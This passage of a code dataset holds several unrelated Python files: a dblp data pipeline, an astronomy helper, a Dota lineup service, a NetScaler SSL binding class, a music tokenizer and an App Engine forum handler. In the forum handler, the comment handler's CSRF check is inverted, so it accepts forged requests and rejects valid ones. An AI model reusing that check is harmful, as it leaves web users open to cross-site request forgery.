encoding=\"utf-8\") as out_f:\n            for line in tqdm(in_f):\n                line = json.loads(line)\n                german_as = [auth for auth in line[\"ai_authors\"]\n                             if auth in german_names]\n                if german_as:\n                    line[\"german_ai_authors\"] = german_as\n                    line[\"german_ai_authors_keys\"] = [german_names[name]\n                                                      for name in german_as]\n                    json.dump(line, out_f)\n                    out_f.write(\"\\n\")\n    print(\"Finished extracting German AI publications. 
\")\n\n\ndef extrat_german_persons(person_source: str = DATA_PATH + 'persons.json',\n data_source : str = DATA_PATH + 'german_ai_community_dataset.json',\n target : str = DATA_PATH + 'german_persons.json') -> None:\n \"\"\"\n Writes all german authors into an author file.\n \"\"\"\n german_keys = set()\n with open(data_source) as file:\n for line in file:\n line = json.loads(line)\n german_keys.update(line[\"german_ai_authors_keys\"])\n with open(target, 'w') as out_file:\n with open(person_source) as in_file:\n for line in in_file:\n line = json.loads(line)\n if line[\"key\"] in german_keys:\n json.dump(line, out_file)\n out_file.write(\"\\n\")\n print(\"Finished extracting all german AI authors!\")\n\n\nif __name__ == '__main__':\n print('**** Starting pipeline process to create AI Datasets****')\n print()\n if not os.path.isdir(DATA_PATH):\n os.makedirs(DATA_PATH)\n\n print('Process 01 - Download dblp data')\n download_dblp()\n\n print('Process 02 - Unzipping dblp data')\n unzip_dblp()\n\n print('Process 03 - Create dblp.json')\n extract_publications()\n\n print('Process 04 - Create ai_dblp.json')\n author_set = extract_ai_publications()\n\n print('Process 05 - Create persons.json')\n extract_persons(author_set)\n\n print('Process 06 - Create author_countries.json')\n parse_countries()\n\n print(\"Process 07 - Create ai_community_dblp.json\")\n extract_community_publications()\n\n print('Process 08 - Extract Semantic scholar information for the AI community.')\n match_semantic_scholar()\n\n print('Process 09 - Extract Semantic scholar information for the AI data')\n # Just filter relevant publications from the AI community dataset, no\n # need for going throguh Semantic Scholar again.\n extract_ai_publications(source=DATA_PATH+'ai_community_dataset.json',\n target=DATA_PATH+'ai_dataset.json')\n\n print('Process 10 - Extract publications from German AI authors.')\n extract_german_ai()\n extract_german_ai(source=DATA_PATH + 'ai_dataset.json',\n target=DATA_PATH + 'german_ai_dataset.json')\n\n print('Process 11 - Extract German AI authors')\n extrat_german_persons()\n\n print('*** Pipeline process to create the data sets finished! ***')\n","repo_name":"TobiasKoopmann/ai-network","sub_path":"Code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"15404750819","text":"import numpy as np\n\ndef geo2helio(r_so,rhat_ob,d):\n\t\"\"\"\n\tReturn the scalar multiplier for 'rhat_ob' that yields an 'r_so' of length 'd'\n\tNB: a=1 so we can omit it from calcs\n\t\"\"\"\n\n\tis_arr = isinstance(rhat_ob,np.ndarray) and rhat_ob.ndim==2\n\n\tif is_arr:\n\t\tb = 2*np.sum(r_so*rhat_ob,axis=1)\n\t\tc = -1*(d**2 - np.sum(r_so*r_so,axis=1))\n\telse:\n\t\tb = 2*np.dot(rhat_ob,r_so)\n\t\tc = -1*(d**2 - np.dot(r_so,r_so))\n\n\ts = np.sqrt(b**2 - 4*c)\n\tr0 = (-b + s)/2.0\n\tr1 = (-b - s)/2.0\n\n\tif is_arr:\n\t\talpha = np.max(np.vstack((r0,r1)).T,axis=1)\n\t\talpha[alpha<0] = np.nan\n\telse:\n\t\talpha = np.max((r0,r1))\n\t\tif alpha<0:\n\t\t\talpha = np.nan\n\n\treturn alpha\n","repo_name":"bengebre/geo2helio","sub_path":"geo2helio.py","file_name":"geo2helio.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"3103313404","text":"import models\n\nclass LineupService:\n def create_lineups(self, match_json):\n dire = []\n radiant = []\n\n if('players' in match_json):\n heroes = match_json['players']\n count = 0\n\n for hero in heroes:\n if count < 5:\n radiant.append(hero['hero_id'])\n else:\n dire.append(hero['hero_id'])\n count += 1\n else:\n radiant_heroes = match_json['radiant']['heroes']\n dire_heroes = match_json['dire']['heroes']\n\n for hero in radiant_heroes:\n radiant.append(hero['id'])\n\n for hero in dire_heroes:\n dire.append(hero['id'])\n\n\n radiant_lineup = models.Lineup(radiant)\n dire_lineup = models.Lineup(dire)\n\n return {\n 'radiant': radiant_lineup,\n 'dire': dire_lineup\n }\n","repo_name":"scsper/dota-lineup-analyzer","sub_path":"old/server/services/lineup_service.py","file_name":"lineup_service.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"2623855874","text":"from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource\nfrom nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response\nfrom nssrc.com.citrix.netscaler.nitro.service.options import options\nfrom nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception\n\nfrom nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util\n\nclass sslvserver_sslpolicy_binding(base_resource) :\n\t\"\"\" Binding class showing the sslpolicy that can be bound to sslvserver.\n\t\"\"\"\n\tdef __init__(self) :\n\t\tself._policyname = None\n\t\tself._priority = None\n\t\tself._type = None\n\t\tself._polinherit = None\n\t\tself._gotopriorityexpression = None\n\t\tself._invoke = None\n\t\tself._labeltype = None\n\t\tself._labelname = None\n\t\tself._vservername = None\n\t\tself.___count = 0\n\n\t@property\n\tdef priority(self) :\n\t\tr\"\"\"The priority of the policies bound to this SSL service. Minimum value = 0 Maximum value = 65534.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._priority\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@priority.setter\n\tdef priority(self, priority) :\n\t\tr\"\"\"The priority of the policies bound to this SSL service. Minimum value = 0 Maximum value = 65534\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._priority = priority\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef policyname(self) :\n\t\tr\"\"\"The name of the SSL policy binding.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._policyname\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@policyname.setter\n\tdef policyname(self, policyname) :\n\t\tr\"\"\"The name of the SSL policy binding.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._policyname = policyname\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef labelname(self) :\n\t\tr\"\"\"Name of the label to invoke if the current policy rule evaluates to TRUE.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._labelname\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@labelname.setter\n\tdef labelname(self, labelname) :\n\t\tr\"\"\"Name of the label to invoke if the current policy rule evaluates to TRUE.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._labelname = labelname\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef vservername(self) :\n\t\tr\"\"\"Name of the SSL virtual server. Minimum length = 1.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._vservername\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@vservername.setter\n\tdef vservername(self, vservername) :\n\t\tr\"\"\"Name of the SSL virtual server. Minimum length = 1\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._vservername = vservername\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef gotopriorityexpression(self) :\n\t\tr\"\"\"Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._gotopriorityexpression\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@gotopriorityexpression.setter\n\tdef gotopriorityexpression(self, gotopriorityexpression) :\n\t\tr\"\"\"Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._gotopriorityexpression = gotopriorityexpression\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef invoke(self) :\n\t\tr\"\"\"Invoke flag. 
This attribute is relevant only for ADVANCED policies.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._invoke\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@invoke.setter\n\tdef invoke(self, invoke) :\n\t\tr\"\"\"Invoke flag. This attribute is relevant only for ADVANCED policies.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._invoke = invoke\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef type(self) :\n\t\tr\"\"\"Bind point to which to bind the policy. Possible Values: HANDSHAKE_REQ, HANDSHAKE_RES, CLIENTHELLO_REQ, CLIENTCERT_REQ, SERVERHELLO_RES, SERVERCERT_RES, SERVERHELLO_DONE_RES and REQUEST. These bindpoints mean:\n\t\t1. HANDSHAKE_REQ: Policy evaluation will be done at the end of handshake on request side (request side means between client and NetScaler)\n\t\t2. HANDSHAKE_RES: Policy evaluation will be done at the end of hadnshake on response side (response side means between Netscaler and server)\n\t\t3. INTERCEPT_REQ: Policy evaluation will be done after receiving Client Hello on request side.\n\t\t4. CLIENTCERT_REQ: Policy evaluation will be done after receiving Client Certificate on request side.\n\t\t5. SERVERHELLO_RES: Policy evaluation will be done after receiving Server Hello on response side.\n\t\t6. SERVERCERT_RES: Policy evaluation will be done after receiving Server Certificate on response side.\n\t\t7. SERVERHELLO_DONE_RES: Policy evaluation will be done after receiving Server Hello Done on response side.\n\t\t8. REQUEST: Policy evaluation will be done at appplication above SSL. This bindpoint is default and is used for actions based on clientauth and client cert. Default value: REQUEST Possible values = HANDSHAKE_REQ, HANDSHAKE_RES, INTERCEPT_REQ, CLIENTCERT_REQ, SERVERHELLO_RES, SERVERCERT_RES, SERVERHELLO_DONE_RES, REQUEST.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._type\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@type.setter\n\tdef type(self, type) :\n\t\tr\"\"\"Bind point to which to bind the policy. Possible Values: HANDSHAKE_REQ, HANDSHAKE_RES, CLIENTHELLO_REQ, CLIENTCERT_REQ, SERVERHELLO_RES, SERVERCERT_RES, SERVERHELLO_DONE_RES and REQUEST. These bindpoints mean:\n\t\t1. HANDSHAKE_REQ: Policy evaluation will be done at the end of handshake on request side (request side means between client and NetScaler)\n\t\t2. HANDSHAKE_RES: Policy evaluation will be done at the end of hadnshake on response side (response side means between Netscaler and server)\n\t\t3. INTERCEPT_REQ: Policy evaluation will be done after receiving Client Hello on request side.\n\t\t4. CLIENTCERT_REQ: Policy evaluation will be done after receiving Client Certificate on request side.\n\t\t5. SERVERHELLO_RES: Policy evaluation will be done after receiving Server Hello on response side.\n\t\t6. SERVERCERT_RES: Policy evaluation will be done after receiving Server Certificate on response side.\n\t\t7. SERVERHELLO_DONE_RES: Policy evaluation will be done after receiving Server Hello Done on response side.\n\t\t8. REQUEST: Policy evaluation will be done at appplication above SSL. This bindpoint is default and is used for actions based on clientauth and client cert. Default value: REQUEST Possible values = HANDSHAKE_REQ, HANDSHAKE_RES, INTERCEPT_REQ, CLIENTCERT_REQ, SERVERHELLO_RES, SERVERCERT_RES, SERVERHELLO_DONE_RES, REQUEST\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._type = type\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef labeltype(self) :\n\t\tr\"\"\"Type of policy label invocation. 
Possible values = vserver, service, policylabel.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._labeltype\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@labeltype.setter\n\tdef labeltype(self, labeltype) :\n\t\tr\"\"\"Type of policy label invocation. Possible values = vserver, service, policylabel\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._labeltype = labeltype\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef polinherit(self) :\n\t\tr\"\"\"Whether the bound policy is a inherited policy or not. Minimum value = 0 Maximum value = 254.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._polinherit\n\t\texcept Exception as e:\n\t\t\traise e\n\n\tdef _get_nitro_response(self, service, response) :\n\t\tr\"\"\" converts nitro response into object and returns the object array in case of get request.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tresult = service.payload_formatter.string_to_resource(sslvserver_sslpolicy_binding_response, response, self.__class__.__name__)\n\t\t\tif(result.errorcode != 0) :\n\t\t\t\tif (result.errorcode == 444) :\n\t\t\t\t\tservice.clear_session(self)\n\t\t\t\tif result.severity :\n\t\t\t\t\tif (result.severity == \"ERROR\") :\n\t\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\t\telse :\n\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\treturn result.sslvserver_sslpolicy_binding\n\t\texcept Exception as e :\n\t\t\traise e\n\n\tdef _get_object_name(self) :\n\t\tr\"\"\" Returns the value of object identifier argument\n\t\t\"\"\"\n\t\ttry :\n\t\t\tif self.vservername is not None :\n\t\t\t\treturn str(self.vservername)\n\t\t\treturn None\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\n\t@classmethod\n\tdef add(cls, client, resource) :\n\t\ttry :\n\t\t\tif resource and type(resource) is not list :\n\t\t\t\tupdateresource = sslvserver_sslpolicy_binding()\n\t\t\t\tupdateresource.vservername = resource.vservername\n\t\t\t\tupdateresource.policyname = resource.policyname\n\t\t\t\tupdateresource.priority = resource.priority\n\t\t\t\tupdateresource.gotopriorityexpression = resource.gotopriorityexpression\n\t\t\t\tupdateresource.invoke = resource.invoke\n\t\t\t\tupdateresource.labeltype = resource.labeltype\n\t\t\t\tupdateresource.labelname = resource.labelname\n\t\t\t\treturn updateresource.update_resource(client)\n\t\t\telse :\n\t\t\t\tif resource and len(resource) > 0 :\n\t\t\t\t\tupdateresources = [sslvserver_sslpolicy_binding() for _ in range(len(resource))]\n\t\t\t\t\tfor i in range(len(resource)) :\n\t\t\t\t\t\tupdateresources[i].vservername = resource[i].vservername\n\t\t\t\t\t\tupdateresources[i].policyname = resource[i].policyname\n\t\t\t\t\t\tupdateresources[i].priority = resource[i].priority\n\t\t\t\t\t\tupdateresources[i].gotopriorityexpression = resource[i].gotopriorityexpression\n\t\t\t\t\t\tupdateresources[i].invoke = resource[i].invoke\n\t\t\t\t\t\tupdateresources[i].labeltype = resource[i].labeltype\n\t\t\t\t\t\tupdateresources[i].labelname = resource[i].labelname\n\t\t\t\treturn cls.update_bulk_request(client, updateresources)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t@classmethod\n\tdef delete(cls, client, resource) :\n\t\ttry :\n\t\t\tif resource and type(resource) is not list :\n\t\t\t\tdeleteresource = sslvserver_sslpolicy_binding()\n\t\t\t\tdeleteresource.vservername = resource.vservername\n\t\t\t\tdeleteresource.policyname = resource.policyname\n\t\t\t\tdeleteresource.priority = resource.priority\n\t\t\t\treturn deleteresource.delete_resource(client)\n\t\t\telse 
:\n\t\t\t\tif resource and len(resource) > 0 :\n\t\t\t\t\tdeleteresources = [sslvserver_sslpolicy_binding() for _ in range(len(resource))]\n\t\t\t\t\tfor i in range(len(resource)) :\n\t\t\t\t\t\tdeleteresources[i].vservername = resource[i].vservername\n\t\t\t\t\t\tdeleteresources[i].policyname = resource[i].policyname\n\t\t\t\t\t\tdeleteresources[i].priority = resource[i].priority\n\t\t\t\treturn cls.delete_bulk_request(client, deleteresources)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t@classmethod\n\tdef get(cls, service, vservername=\"\", option_=\"\") :\n\t\tr\"\"\" Use this API to fetch sslvserver_sslpolicy_binding resources.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tif not vservername :\n\t\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\t\tresponse = obj.get_resources(service, option_)\n\t\t\telse :\n\t\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\t\tobj.vservername = vservername\n\t\t\t\tresponse = obj.get_resources(service)\n\t\t\t\treturn response\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef get_filtered(cls, service, vservername, filter_) :\n\t\tr\"\"\" Use this API to fetch filtered set of sslvserver_sslpolicy_binding resources.\n\t\tFilter string should be in JSON format.eg: \"port:80,servicetype:HTTP\".\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\tobj.vservername = vservername\n\t\t\toption_ = options()\n\t\t\toption_.filter = filter_\n\t\t\tresponse = obj.getfiltered(service, option_)\n\t\t\treturn response\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef count(cls, service, vservername) :\n\t\tr\"\"\" Use this API to count sslvserver_sslpolicy_binding resources configued on NetScaler.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\tobj.vservername = vservername\n\t\t\toption_ = options()\n\t\t\toption_.count = True\n\t\t\tresponse = obj.get_resources(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['___count']\n\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef count_filtered(cls, service, vservername, filter_) :\n\t\tr\"\"\" Use this API to count the filtered set of sslvserver_sslpolicy_binding resources.\n\t\tFilter string should be in JSON format.eg: \"port:80,servicetype:HTTP\".\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\tobj.vservername = vservername\n\t\t\toption_ = options()\n\t\t\toption_.count = True\n\t\t\toption_.filter = filter_\n\t\t\tresponse = obj.getfiltered(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['___count']\n\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\traise e\n\n\tclass Ecccurvename:\n\t\tALL = \"ALL\"\n\t\tP_224 = \"P_224\"\n\t\tP_256 = \"P_256\"\n\t\tP_384 = \"P_384\"\n\t\tP_521 = \"P_521\"\n\n\tclass Ocspcheck:\n\t\tMandatory = \"Mandatory\"\n\t\tOptional = \"Optional\"\n\n\tclass Crlcheck:\n\t\tMandatory = \"Mandatory\"\n\t\tOptional = \"Optional\"\n\n\tclass Type:\n\t\tHANDSHAKE_REQ = \"HANDSHAKE_REQ\"\n\t\tHANDSHAKE_RES = \"HANDSHAKE_RES\"\n\t\tINTERCEPT_REQ = \"INTERCEPT_REQ\"\n\t\tCLIENTCERT_REQ = \"CLIENTCERT_REQ\"\n\t\tSERVERHELLO_RES = \"SERVERHELLO_RES\"\n\t\tSERVERCERT_RES = \"SERVERCERT_RES\"\n\t\tSERVERHELLO_DONE_RES = \"SERVERHELLO_DONE_RES\"\n\t\tREQUEST = \"REQUEST\"\n\n\tclass Labeltype:\n\t\tvserver = \"vserver\"\n\t\tservice = \"service\"\n\t\tpolicylabel = \"policylabel\"\n\nclass sslvserver_sslpolicy_binding_response(base_response) :\n\tdef __init__(self, length=1) :\n\t\tself.sslvserver_sslpolicy_binding = 
[]\n\t\tself.errorcode = 0\n\t\tself.message = \"\"\n\t\tself.severity = \"\"\n\t\tself.sessionid = \"\"\n\t\tself.sslvserver_sslpolicy_binding = [sslvserver_sslpolicy_binding() for _ in range(length)]\n\n","repo_name":"MayankTahil/nitro-ide","sub_path":"nitro-python-1.0/nssrc/com/citrix/netscaler/nitro/resource/config/ssl/sslvserver_sslpolicy_binding.py","file_name":"sslvserver_sslpolicy_binding.py","file_ext":"py","file_size_in_byte":12851,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
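A typical call pattern for this generated binding class, as a sketch only: it assumes a reachable NetScaler appliance at a placeholder address, placeholder credentials, and an existing SSL virtual server named "ssl_vs1" (all hypothetical).

from nssrc.com.citrix.netscaler.nitro.service.nitro_service import nitro_service
from nssrc.com.citrix.netscaler.nitro.resource.config.ssl.sslvserver_sslpolicy_binding import sslvserver_sslpolicy_binding

client = nitro_service("10.0.0.1", "http")  # hypothetical appliance address
client.login("nsroot", "nsroot")            # hypothetical credentials

# fetch and count the policy bindings of one vserver
bindings = sslvserver_sslpolicy_binding.get(client, "ssl_vs1")
for b in bindings or []:
    print(b.policyname, b.priority, b.type)
print(sslvserver_sslpolicy_binding.count(client, "ssl_vs1"))

client.logout()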
+{"seq_id":"2661690726","text":"import os\nimport torch\nimport numpy as np\nimport copy\nimport partitura as pt\nfrom einops import rearrange, repeat\nimport pandas as pd\nfrom miditoolkit import MidiFile\nfrom einops import repeat\nimport utils as utils\n\n\ndef clip_segs(tokens, cfg):\n \"\"\"clip the token sequence according to segmentation scheme\n\n Return:\n seg_tokens: np.array: (n_segs, seg_length)\n \"\"\"\n\n \"\"\"choose the number of segments to clip\"\"\"\n if cfg.segmentation.seg_type == \"fix_num\":\n n_segs = cfg.experiment.n_segs\n l = int(len(tokens) / cfg.experiment.n_segs)\n elif cfg.segmentation.seg_type == \"fix_size\":\n n_segs = int(len(tokens) / cfg.sequence.max_seq_len) + 1\n l = cfg.sequence.max_seq_len\n\n\n \"\"\"Clip rolls into segments and add padding\"\"\"\n seg_tokens = []\n for i in range(n_segs): \n seg_tokens.append(tokens[ i*l: i*l+l ][:cfg.sequence.max_seq_len])\n return seg_tokens\n\n\ndef pad_segs(seg_tokens, cfg):\n if cfg.sequence.mid_encoding == \"CPWord\":\n seg_tokens = [np.concatenate([seg_token, repeat(np.array([0] * 6), 'd -> k d', k=( cfg.sequence.max_seq_len - len(seg_token)))])\n for seg_token in seg_tokens if seg_token] \n seg_tokens = [np.pad(seg_token, (0, cfg.sequence.max_seq_len - len(seg_token)), mode=\"constant\", constant_values=0)\n for seg_token in seg_tokens]\n return np.array(seg_tokens) # ()\n \n\ndef perfmidi_to_sequence(path, tokenizer, cfg):\n \"\"\"Process MIDI events to sequences using miditok\n - segment the sequence in various segmentation scheme, and then pad the sequences\n \n Returns:\n seg_tokens: (n_segs, max_seq_len)\n \"\"\"\n midi = MidiFile(path)\n if cfg.segmentation.seg_type == \"fix_time\":\n \"\"\"For the fix_time segmentation, we get different segments in midi and then tokenize them\"\"\"\n seg_tokens, i = [], 0\n mapping = midi.get_tick_to_time_mapping()\n instrument_track = copy.deepcopy(midi.instruments[0])\n while True:\n # _midi = copy.deepcopy(midi)\n # instrument_track = _midi.instruments[0]\n start, end = (i)*cfg.segmentation.seg_time, (i+1)*cfg.segmentation.seg_time \n midi.instruments[0].notes = [note for note in instrument_track.notes \n if (note.start < len(mapping) and \n (mapping[note.start] < end and (mapping[note.start]) > start))]\n if not midi.instruments[0].notes:\n break\n print(len(midi.instruments[0].notes))\n tokens = tokenizer(midi)[0]\n utils.try_save_BPE_tokens(tokenizer, tokens, cfg)\n if cfg.sequence.BPE:\n tokens = tokenizer.apply_bpe(tokens)\n seg_tokens.append(tokens[:cfg.sequence.max_seq_len])\n i += 1\n else:\n tokens = tokenizer(midi)[0] # (l, )\n if cfg.sequence.BPE:\n tokens = tokenizer.apply_bpe(tokens)\n seg_tokens = clip_segs(tokens, cfg)\n\n seg_tokens = pad_segs(seg_tokens, cfg)\n assert(seg_tokens.shape[1] == cfg.sequence.max_seq_len)\n return seg_tokens # (s l)\n\n\ndef musicxml_to_sequence(path, tokenizer, cfg):\n \"\"\"Process musicxml to sequences using miditok\"\"\"\n import warnings\n warnings.filterwarnings(\"ignore\") # mute partitura warnings\n\n try:\n score = pt.load_musicxml(path)\n if \"Kreisleriana,_Op._16/VIII._Schnell_und_spielend/\" in path:\n raise RuntimeError\n except Exception as e:\n print(\"Failed on score {} with exception {}\".format(os.path.splitext(os.path.basename(path))[0], e))\n return None\n \n if cfg.segmentation.seg_type == \"fix_time\":\n \"\"\"For the fix_time segmentation, we get different segments in score and then tokenize them\"\"\"\n seg_tokens, i = [], 0\n for i in range(int(score.note_array()['onset_beat'].max() / 
cfg.segmentation.seg_beat) + 1):\n tokens = tokenizer.track_to_tokens(score, start_end_beat=(i*cfg.segmentation.seg_beat, (i+1)*cfg.segmentation.seg_beat))\n utils.try_save_BPE_tokens(tokenizer, tokens, cfg)\n if cfg.sequence.BPE:\n tokens = tokenizer.apply_bpe(tokens)\n seg_tokens.append(tokens[:cfg.sequence.max_seq_len])\n print(len(tokens))\n else:\n tokens = tokenizer.track_to_tokens(score)\n if cfg.sequence.BPE:\n tokens = tokenizer.apply_bpe(tokens)\n seg_tokens = clip_segs(tokens, cfg) \n\n seg_tokens = pad_segs(seg_tokens, cfg)\n\n assert(seg_tokens.shape[1] == cfg.sequence.max_seq_len)\n return seg_tokens # (s l)\n\n\ndef batch_to_sequence(batch, cfg, device, tokenizer):\n \"\"\"Map the batch to input token sequences \n\n Args:\n batch (2, b): ([path, path, ...], [label, label, ...])\n Returns: (matrix, label)\n batch_sequence: (b, )\n batch_label: (b, )\n \"\"\"\n files, labels = batch\n b = len(batch[0])\n batch_sequence, batch_labels = [], []\n\n for idx, (path, l) in enumerate(zip(files, labels)):\n # print(path)\n recompute = True\n if cfg.experiment.load_data: # load existing data\n res = utils.load_data(path, cfg)\n if type(res) == np.ndarray: # keep computing if not exist\n seg_sequences = res\n recompute = False\n\n # events = tokenizer.tokens_to_events(list(seg_sequences[0]))\n if recompute:\n if cfg.experiment.input_format == \"perfmidi\":\n seg_sequences = perfmidi_to_sequence(path, tokenizer, cfg)\n elif cfg.experiment.input_format == \"musicxml\":\n res = musicxml_to_sequence(path, tokenizer, cfg)\n if type(res) == np.ndarray:\n seg_sequences = res\n else: # in case that the xml has parsing error, we skip and copy existing data at the end.\n continue\n\n utils.save_data(path, seg_sequences, cfg)\n\n batch_sequence.append(seg_sequences)\n batch_labels.append(l)\n \n if cfg.experiment.tmp:\n example = batch_sequence[10][0, :50]\n for e in tokenizer.tokens_to_events(example):\n print(e)\n # byte_counts = []\n # for piece_segments in batch_sequence:\n # total_bytes = 0\n # for ss in piece_segments:\n # total_bytes += np.array(ss).nbytes\n # byte_counts.append(total_bytes)\n # byte_counts = np.array(byte_counts)\n batch_sequence, batch_labels = utils.pad_batch(b, cfg, device, batch_sequence, batch_labels)\n batch_sequence = torch.tensor(np.array(batch_sequence), device=device, dtype=torch.float32) \n return batch_sequence, batch_labels\n","repo_name":"anusfoil/SymRep","sub_path":"converters/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":6728,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"19"}
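In fix_size mode, clip_segs cuts the token stream into len(tokens)//max_seq_len + 1 windows and pad_segs right-pads each window with zeros. A dependency-light sketch of that behaviour, with plain integers standing in for tokens and a single constant standing in for cfg.sequence.max_seq_len:

import numpy as np

MAX_SEQ_LEN = 4  # stands in for cfg.sequence.max_seq_len

def clip_and_pad(tokens):
    # same segment count rule as the original (an extra segment can be all padding)
    n_segs = len(tokens) // MAX_SEQ_LEN + 1
    segs = [tokens[i * MAX_SEQ_LEN:(i + 1) * MAX_SEQ_LEN] for i in range(n_segs)]
    return np.array([np.pad(s, (0, MAX_SEQ_LEN - len(s))) for s in segs])

print(clip_and_pad(list(range(10))))
# [[0 1 2 3]
#  [4 5 6 7]
#  [8 9 0 0]]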
+{"seq_id":"36052795392","text":"from handlers.base import BaseHandler\nfrom google.appengine.api import users, memcache\nfrom models.models import Topic, Comment\nimport uuid\nimport datetime\n\nclass TopicAdd(BaseHandler):\n def get(self):\n csrf_token = str(uuid.uuid4())\n memcache.add(key=csrf_token, value=True, time=600)\n params = {\"csrf_token\": csrf_token}\n return self.render_template(\"topic_add.html\", params=params)\n\n def post(self):\n user = users.get_current_user()\n\n csrf_token = self.request.get(\"csrf_token\")\n mem_token = memcache.get(key=csrf_token)\n\n if not mem_token:\n return self.write(\"Hacker at the doors\")\n\n title = self.request.get(\"title\")\n text = self.request.get(\"text\")\n\n new_topic = Topic(title=title, content=text, author_email=user.email())\n new_topic.put()\n\n return self.redirect_to(\"topic-details\", topic_id=new_topic.key.id())\n\n\nclass TopicDetails(BaseHandler):\n def get(self, topic_id):\n csrf_token = str(uuid.uuid4())\n memcache.add(key=csrf_token, value=True, time=600)\n\n topic = Topic.get_by_id(int(topic_id))\n comment = Comment.query(Comment.topic_id == topic.key.id()).order(Comment.created).fetch()\n\n params = {\"topic\": topic, \"comment\": comment, \"csrf_token\": csrf_token}\n\n return self.render_template(\"topic_details.html\", params=params)\n\n\nclass CommentAdd(BaseHandler):\n def post(self, topic_id):\n user = users.get_current_user()\n time = datetime.datetime.now()\n\n csrf_token = self.request.get(\"csrf_token\")\n mem_token = memcache.get(key=csrf_token)\n\n if mem_token:\n return self.write(\"Hacker at the doors\")\n\n comment = self.request.get(\"comment\")\n topic = Topic.get_by_id(int(topic_id))\n new_comment = Comment(content=comment, topic_id=topic.key.id(), author_email=user.email(),\n topic_title=topic.title, created=time)\n new_comment.put()\n\n return self.redirect_to(\"topic-details\", topic_id=topic.key.id())","repo_name":"RokP85/7.DN","sub_path":"wd2-boilerplate-master/handlers/topics.py","file_name":"topics.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
